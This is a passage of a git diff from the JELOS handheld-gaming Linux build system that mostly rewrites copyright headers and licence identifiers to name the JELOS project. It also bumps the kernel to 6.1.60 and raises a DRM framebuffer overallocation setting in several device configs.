+PKG_LICENSE="GPLv2" PKG_SITE="www.jelos.org" PKG_SECTION="virtual" PKG_LONGDESC="Cloud/local sync tools metapackage." diff --git a/packages/virtual/x86/package.mk b/packages/virtual/x86/package.mk index 76312fba1..d0e7ab7b1 100644 --- a/packages/virtual/x86/package.mk +++ b/packages/virtual/x86/package.mk @@ -1,8 +1,8 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022 - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="x86" -PKG_LICENSE="Apache-2.0" +PKG_LICENSE="GPLv2" PKG_SITE="www.jelos.org" PKG_DEPENDS_TARGET="toolchain squashfs-tools:host dosfstools:host fakeroot:host kmod:host mtools:host populatefs:host libc gcc linux linux-drivers linux-firmware libusb unzip socat p7zip file SDL2 SDL2_gfx SDL2_image SDL2_mixer SDL2_net SDL2_ttf" PKG_SECTION="virtual" diff --git a/packages/web/curl/package.mk b/packages/web/curl/package.mk index fac8f899e..64a23a131 100644 --- a/packages/web/curl/package.mk +++ b/packages/web/curl/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="curl" PKG_VERSION="8.0.1" diff --git a/packages/web/nghttp2/package.mk b/packages/web/nghttp2/package.mk index cdec7bc24..a3f1bba46 100644 --- a/packages/web/nghttp2/package.mk +++ b/packages/web/nghttp2/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="nghttp2" PKG_VERSION="1.52.0" diff --git a/packages/x11/app/xterm/package.mk b/packages/x11/app/xterm/package.mk index 068965fe4..43eddb150 100644 --- a/packages/x11/app/xterm/package.mk +++ b/packages/x11/app/xterm/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="xterm" PKG_VERSION="379" diff --git a/packages/x11/lib/libXaw/package.mk b/packages/x11/lib/libXaw/package.mk index 342fc6eff..5e4c2c5fa 100644 --- a/packages/x11/lib/libXaw/package.mk +++ b/packages/x11/lib/libXaw/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libXaw" PKG_VERSION="1.0.14" diff --git a/packages/x11/lib/libXpm/package.mk b/packages/x11/lib/libXpm/package.mk index 75412db89..3b4c34f23 100644 --- a/packages/x11/lib/libXpm/package.mk +++ b/packages/x11/lib/libXpm/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libXpm" PKG_VERSION="3.5.13" diff --git a/packages/x11/lib/libxcb-cursor/package.mk b/packages/x11/lib/libxcb-cursor/package.mk index 34207170e..9956b69ad 100644 --- a/packages/x11/lib/libxcb-cursor/package.mk +++ b/packages/x11/lib/libxcb-cursor/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023 Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libxcb-cursor" PKG_VERSION="103bccad6f4a421ede6a0ef2eecc2749ff9be083" diff --git a/projects/Amlogic/bootloader/mkimage b/projects/Amlogic/bootloader/mkimage index 0eb0f0dba..08d644410 100644 --- a/projects/Amlogic/bootloader/mkimage +++ b/projects/Amlogic/bootloader/mkimage @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) mkimage_uboot() { if [ -f "${RELEASE_DIR}/3rdparty/bootloader/${SUBDEVICE}_u-boot" ]; then diff --git a/projects/Amlogic/bootloader/release b/projects/Amlogic/bootloader/release index f834ed8a3..0945beaa7 100644 --- a/projects/Amlogic/bootloader/release +++ b/projects/Amlogic/bootloader/release @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) mkdir -p ${RELEASE_DIR}/3rdparty/bootloader cp -a ${INSTALL}/usr/share/bootloader/* ${RELEASE_DIR}/3rdparty/bootloader diff --git a/projects/Amlogic/bootloader/update.sh b/projects/Amlogic/bootloader/update.sh index 59d60da38..44a78113b 100755 --- a/projects/Amlogic/bootloader/update.sh +++ b/projects/Amlogic/bootloader/update.sh @@ -1,7 +1,7 @@ #!/bin/sh # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-2021 Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) [ -z "$SYSTEM_ROOT" ] && SYSTEM_ROOT="" [ -z "$BOOT_ROOT" ] && BOOT_ROOT="/flash" diff --git a/projects/Amlogic/devices/S922X/linux/linux.aarch64.conf b/projects/Amlogic/devices/S922X/linux/linux.aarch64.conf index e07235c4b..272a2c93b 100644 --- a/projects/Amlogic/devices/S922X/linux/linux.aarch64.conf +++ b/projects/Amlogic/devices/S922X/linux/linux.aarch64.conf @@ -4147,7 +4147,7 @@ CONFIG_DRM_KMS_HELPER=y # CONFIG_DRM_DEBUG_DP_MST_TOPOLOGY_REFS is not set CONFIG_DRM_DEBUG_MODESET_LOCK=y CONFIG_DRM_FBDEV_EMULATION=y -CONFIG_DRM_FBDEV_OVERALLOC=100 +CONFIG_DRM_FBDEV_OVERALLOC=200 # CONFIG_DRM_FBDEV_LEAK_PHYS_SMEM is not set CONFIG_DRM_LOAD_EDID_FIRMWARE=y CONFIG_DRM_DISPLAY_HELPER=y diff --git a/projects/Amlogic/packages/amlogic-boot-fip/package.mk b/projects/Amlogic/packages/amlogic-boot-fip/package.mk index d9bf85105..fc9b1d855 100644 --- a/projects/Amlogic/packages/amlogic-boot-fip/package.mk +++ b/projects/Amlogic/packages/amlogic-boot-fip/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="amlogic-boot-fip" PKG_VERSION="e96b6a694380ff07d5a9e4be644ffe254bd18512" diff --git a/projects/Amlogic/packages/linux/package.mk b/projects/Amlogic/packages/linux/package.mk index 9e2cccabd..7db58e566 100644 --- a/projects/Amlogic/packages/linux/package.mk +++ b/projects/Amlogic/packages/linux/package.mk @@ -2,8 +2,7 @@ # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022-present Fewtarius -# Copyright (C) 2022-present Brooksytech +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="linux" PKG_LICENSE="GPL" @@ -19,7 +18,7 @@ PKG_PATCH_DIRS+="${DEVICE}" case ${DEVICE} in S922X*) - PKG_VERSION="6.1.59" + PKG_VERSION="6.1.60" PKG_URL="https://www.kernel.org/pub/linux/kernel/v6.x/${PKG_NAME}-${PKG_VERSION}.tar.xz" ;; esac diff --git a/projects/Amlogic/packages/linux/patches/S922X/000-s922x-devices.patch b/projects/Amlogic/packages/linux/patches/S922X/000-s922x-devices.patch index 9093b89a7..0b0079d91 100644 --- a/projects/Amlogic/packages/linux/patches/S922X/000-s922x-devices.patch +++ b/projects/Amlogic/packages/linux/patches/S922X/000-s922x-devices.patch @@ -1135,7 +1135,7 @@ diff -rupN linux.orig/arch/arm64/boot/dts/amlogic/meson-g12b-powkiddy-rgb10-max- +// SPDX-License-Identifier: (GPL-2.0+ OR MIT) +/* + * Copyright (c) 2022 Neil Armstrong -+ * Copyright (C) 2023 BrooksyTech (https://github.com/brooksytech) ++ * Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) + */ + +/dts-v1/; diff --git a/projects/Amlogic/packages/u-boot-Odroid_GOU/package.mk b/projects/Amlogic/packages/u-boot-Odroid_GOU/package.mk index fa499ebe7..c0691b09a 100644 --- a/projects/Amlogic/packages/u-boot-Odroid_GOU/package.mk +++ b/projects/Amlogic/packages/u-boot-Odroid_GOU/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="u-boot-Odroid_GOU" PKG_VERSION="9235942906216dc529c1e96f67dd2364a94d0738" diff --git a/projects/Amlogic/packages/u-boot-Odroid_N2/package.mk b/projects/Amlogic/packages/u-boot-Odroid_N2/package.mk index 8fcfc4ef4..2fa53a713 100644 --- a/projects/Amlogic/packages/u-boot-Odroid_N2/package.mk +++ b/projects/Amlogic/packages/u-boot-Odroid_N2/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="u-boot-Odroid_N2" PKG_VERSION="v2023.10" diff --git a/projects/Amlogic/packages/u-boot/package.mk b/projects/Amlogic/packages/u-boot/package.mk index 9b3ec71d6..0457a5583 100644 --- a/projects/Amlogic/packages/u-boot/package.mk +++ b/projects/Amlogic/packages/u-boot/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="u-boot" PKG_VERSION="1.0" diff --git a/projects/PC/devices/AMD64/linux/linux.x86_64.conf b/projects/PC/devices/AMD64/linux/linux.x86_64.conf index 20914a99a..9beab031e 100644 --- a/projects/PC/devices/AMD64/linux/linux.x86_64.conf +++ b/projects/PC/devices/AMD64/linux/linux.x86_64.conf @@ -6681,7 +6681,7 @@ CONFIG_DRM_KMS_HELPER=y # CONFIG_DRM_DEBUG_DP_MST_TOPOLOGY_REFS is not set # CONFIG_DRM_DEBUG_MODESET_LOCK is not set CONFIG_DRM_FBDEV_EMULATION=y -CONFIG_DRM_FBDEV_OVERALLOC=100 +CONFIG_DRM_FBDEV_OVERALLOC=200 # CONFIG_DRM_FBDEV_LEAK_PHYS_SMEM is not set CONFIG_DRM_LOAD_EDID_FIRMWARE=y CONFIG_DRM_DISPLAY_HELPER=m diff --git a/projects/Rockchip/bootloader/install b/projects/Rockchip/bootloader/install index 013ed9c9d..142554ace 100755 --- a/projects/Rockchip/bootloader/install +++ b/projects/Rockchip/bootloader/install @@ -1,7 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-2021 Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius -# Copyright (C) 2023-present Brooksytech +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_RKBIN="$(get_build_dir rkbin)" PKG_UBOOT="$(get_build_dir u-boot)" diff --git a/projects/Rockchip/bootloader/mkimage b/projects/Rockchip/bootloader/mkimage index e6cb8b965..02af545a4 100755 --- a/projects/Rockchip/bootloader/mkimage +++ b/projects/Rockchip/bootloader/mkimage @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-2020 Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source ${PROJECT_DIR}/${PROJECT}/devices/${DEVICE}/options diff --git a/projects/Rockchip/bootloader/release b/projects/Rockchip/bootloader/release index a11abc248..f7665f465 100755 --- a/projects/Rockchip/bootloader/release +++ b/projects/Rockchip/bootloader/release @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-2021 Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) mkdir -p ${RELEASE_DIR}/3rdparty/bootloader if [ -n "${UBOOT_CONFIG}" ]; then diff --git a/projects/Rockchip/bootloader/update.sh b/projects/Rockchip/bootloader/update.sh index 6d0374b52..a6210aab8 100755 --- a/projects/Rockchip/bootloader/update.sh +++ b/projects/Rockchip/bootloader/update.sh @@ -1,7 +1,7 @@ #!/bin/sh # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-2021 Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) [ -z "$SYSTEM_ROOT" ] && SYSTEM_ROOT="" [ -z "$BOOT_ROOT" ] && BOOT_ROOT="/flash" diff --git a/projects/Rockchip/devices/RK3326/linux/linux.aarch64.conf b/projects/Rockchip/devices/RK3326/linux/linux.aarch64.conf index fde9f78a5..e7a895a4f 100644 --- a/projects/Rockchip/devices/RK3326/linux/linux.aarch64.conf +++ b/projects/Rockchip/devices/RK3326/linux/linux.aarch64.conf @@ -3288,7 +3288,7 @@ CONFIG_DRM_KMS_HELPER=y # CONFIG_DRM_DEBUG_DP_MST_TOPOLOGY_REFS is not set # CONFIG_DRM_DEBUG_MODESET_LOCK is not set CONFIG_DRM_FBDEV_EMULATION=y -CONFIG_DRM_FBDEV_OVERALLOC=100 +CONFIG_DRM_FBDEV_OVERALLOC=200 # CONFIG_DRM_FBDEV_LEAK_PHYS_SMEM is not set # CONFIG_DRM_LOAD_EDID_FIRMWARE is not set CONFIG_DRM_DISPLAY_HELPER=y diff --git a/projects/Rockchip/devices/RK3399/linux/linux.aarch64.conf b/projects/Rockchip/devices/RK3399/linux/linux.aarch64.conf index 7360751eb..12202bad8 100644 --- a/projects/Rockchip/devices/RK3399/linux/linux.aarch64.conf +++ b/projects/Rockchip/devices/RK3399/linux/linux.aarch64.conf @@ -4579,7 +4579,7 @@ CONFIG_DRM_KMS_HELPER=y # CONFIG_DRM_DEBUG_DP_MST_TOPOLOGY_REFS is not set # CONFIG_DRM_DEBUG_MODESET_LOCK is not set CONFIG_DRM_FBDEV_EMULATION=y -CONFIG_DRM_FBDEV_OVERALLOC=100 +CONFIG_DRM_FBDEV_OVERALLOC=200 # CONFIG_DRM_FBDEV_LEAK_PHYS_SMEM is not set # CONFIG_DRM_LOAD_EDID_FIRMWARE is not set CONFIG_DRM_DISPLAY_HELPER=y diff --git a/projects/Rockchip/devices/RK3566-X55/linux/linux.aarch64.conf b/projects/Rockchip/devices/RK3566-X55/linux/linux.aarch64.conf index 889658e2e..1e3a090b3 100644 --- a/projects/Rockchip/devices/RK3566-X55/linux/linux.aarch64.conf +++ b/projects/Rockchip/devices/RK3566-X55/linux/linux.aarch64.conf @@ -3366,7 +3366,7 @@ CONFIG_DRM_MIPI_DSI=y CONFIG_DRM_KMS_HELPER=y CONFIG_DRM_KMS_FB_HELPER=y CONFIG_DRM_FBDEV_EMULATION=y -CONFIG_DRM_FBDEV_OVERALLOC=100 +CONFIG_DRM_FBDEV_OVERALLOC=200 # CONFIG_DRM_FBDEV_LEAK_PHYS_SMEM is not set CONFIG_DRM_LOAD_EDID_FIRMWARE=y # CONFIG_DRM_DP_CEC is not set diff --git a/projects/Rockchip/devices/RK3566/linux/linux.aarch64.conf b/projects/Rockchip/devices/RK3566/linux/linux.aarch64.conf index a84c5c04c..1aef0a017 100644 --- a/projects/Rockchip/devices/RK3566/linux/linux.aarch64.conf +++ b/projects/Rockchip/devices/RK3566/linux/linux.aarch64.conf @@ -3532,7 +3532,7 @@ CONFIG_DRM_MIPI_DSI=y CONFIG_DRM_KMS_HELPER=y CONFIG_DRM_KMS_FB_HELPER=y CONFIG_DRM_FBDEV_EMULATION=y -CONFIG_DRM_FBDEV_OVERALLOC=100 +CONFIG_DRM_FBDEV_OVERALLOC=200 # CONFIG_DRM_FBDEV_LEAK_PHYS_SMEM is not set CONFIG_DRM_LOAD_EDID_FIRMWARE=y # CONFIG_DRM_DP_CEC is not set diff --git a/projects/Rockchip/devices/RK3588/linux/linux.aarch64.conf b/projects/Rockchip/devices/RK3588/linux/linux.aarch64.conf index 6f850886e..d0dde995d 100644 --- a/projects/Rockchip/devices/RK3588/linux/linux.aarch64.conf +++ b/projects/Rockchip/devices/RK3588/linux/linux.aarch64.conf @@ -4714,7 +4714,7 @@ CONFIG_DRM_KMS_HELPER=y CONFIG_DRM_KMS_FB_HELPER=y # CONFIG_DRM_DEBUG_DP_MST_TOPOLOGY_REFS is not set CONFIG_DRM_FBDEV_EMULATION=y -CONFIG_DRM_FBDEV_OVERALLOC=100 +CONFIG_DRM_FBDEV_OVERALLOC=200 # CONFIG_DRM_FBDEV_LEAK_PHYS_SMEM is not set CONFIG_DRM_LOAD_EDID_FIRMWARE=y # CONFIG_DRM_DP_CEC is not set diff --git a/projects/Rockchip/packages/linux/package.mk b/projects/Rockchip/packages/linux/package.mk index 5f83149e1..1391f58be 100644 --- a/projects/Rockchip/packages/linux/package.mk +++ b/projects/Rockchip/packages/linux/package.mk @@ -2,8 +2,7 @@ # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022-present Fewtarius -# Copyright (C) 2022-present Brooksytech +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="linux" PKG_LICENSE="GPL" @@ -37,7 +36,7 @@ case ${DEVICE} in PKG_GIT_CLONE_BRANCH="main" ;; RK33*) - PKG_VERSION="6.1.59" + PKG_VERSION="6.1.60" PKG_URL="https://www.kernel.org/pub/linux/kernel/v6.x/${PKG_NAME}-${PKG_VERSION}.tar.xz" ;; esac diff --git a/projects/Rockchip/packages/linux/patches/RK3399/000-rk3399-devices.patch b/projects/Rockchip/packages/linux/patches/RK3399/000-rk3399-devices.patch index 78f4f3180..10037bc12 100644 --- a/projects/Rockchip/packages/linux/patches/RK3399/000-rk3399-devices.patch +++ b/projects/Rockchip/packages/linux/patches/RK3399/000-rk3399-devices.patch @@ -37,7 +37,7 @@ diff -rupN linux.orig/arch/arm64/boot/dts/rockchip/rk3399-anbernic-rg552-opp.dts +// SPDX-License-Identifier: (GPL-2.0+ OR MIT) +/* + * Copyright (c) 2016-2017 Fuzhou Rockchip Electronics Co., Ltd -+ * Copyright (C) 2023 BrooksyTech (https://github.com/brooksytech) ++ * Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) + */ + +/ { @@ -184,7 +184,7 @@ diff -rupN linux.orig/arch/arm64/boot/dts/rockchip/rk3399-anbernic-rg552.dts lin + * Copyright (c) 2017 Fuzhou Rockchip Electronics Co., Ltd. + * Copyright (c) 2018 Akash Gajjar + * Copyright (c) 2022 Maya Matuszczyk -+ * Copyright (C) 2023 BrooksyTech (https://github.com/brooksytech) ++ * Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) + */ + + diff --git a/projects/Rockchip/packages/u-boot/package.mk b/projects/Rockchip/packages/u-boot/package.mk index ff1b8279f..83e159ec9 100644 --- a/projects/Rockchip/packages/u-boot/package.mk +++ b/projects/Rockchip/packages/u-boot/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="u-boot" PKG_ARCH="arm aarch64" diff --git a/scripts/build_compat b/scripts/build_compat index d80219d3f..5aac94acf 100755 --- a/scripts/build_compat +++ b/scripts/build_compat @@ -4,7 +4,7 @@ # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-2018 Team LibreELEC (https://libreelec.tv) # Copyright (C) 2018-present Team CoreELEC (https://coreelec.org) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) unset _CACHE_PACKAGE_LOCAL _CACHE_PACKAGE_GLOBAL _DEBUG_DEPENDS_LIST _DEBUG_PACKAGE_LIST diff --git a/scripts/build_distro b/scripts/build_distro index 047c58e85..d41f146ce 100755 --- a/scripts/build_distro +++ b/scripts/build_distro @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### ### Simple script to build JELOS diff --git a/scripts/image b/scripts/image index 556eb9c3a..5cfe9b4ba 100755 --- a/scripts/image +++ b/scripts/image @@ -4,7 +4,7 @@ # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-2018 Team LibreELEC (https://libreelec.tv) # Copyright (C) 2018-present Team CoreELEC (https://coreelec.org) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) unset _CACHE_PACKAGE_LOCAL _CACHE_PACKAGE_GLOBAL _DEBUG_DEPENDS_LIST _DEBUG_PACKAGE_LIST diff --git a/scripts/mkimage b/scripts/mkimage index 0af45bdeb..94c024879 100755 --- a/scripts/mkimage +++ b/scripts/mkimage @@ -3,7 +3,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Copyright (C) 2022-present UnofficialOS ################################################################################ diff --git a/scripts/update_packages b/scripts/update_packages index 077b3e45d..e54516310 100755 --- a/scripts/update_packages +++ b/scripts/update_packages @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Based on work by ToKe79 and Shanti Gilbert diff --git a/tools/burnimage b/tools/burnimage index 6b3dbd6aa..7c0e8d2ba 100755 --- a/tools/burnimage +++ b/tools/burnimage @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . config/options '' diff --git a/tools/dashboard b/tools/dashboard index 74378fcbd..b8b856974 100755 --- a/tools/dashboard +++ b/tools/dashboard @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### ### A simple loop to watch the status of any active builds. diff --git a/tools/foreach b/tools/foreach index b997e6058..5892de8c0 100755 --- a/tools/foreach +++ b/tools/foreach @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### ### A simple loop to allow running commands against all projects/devices/architectures.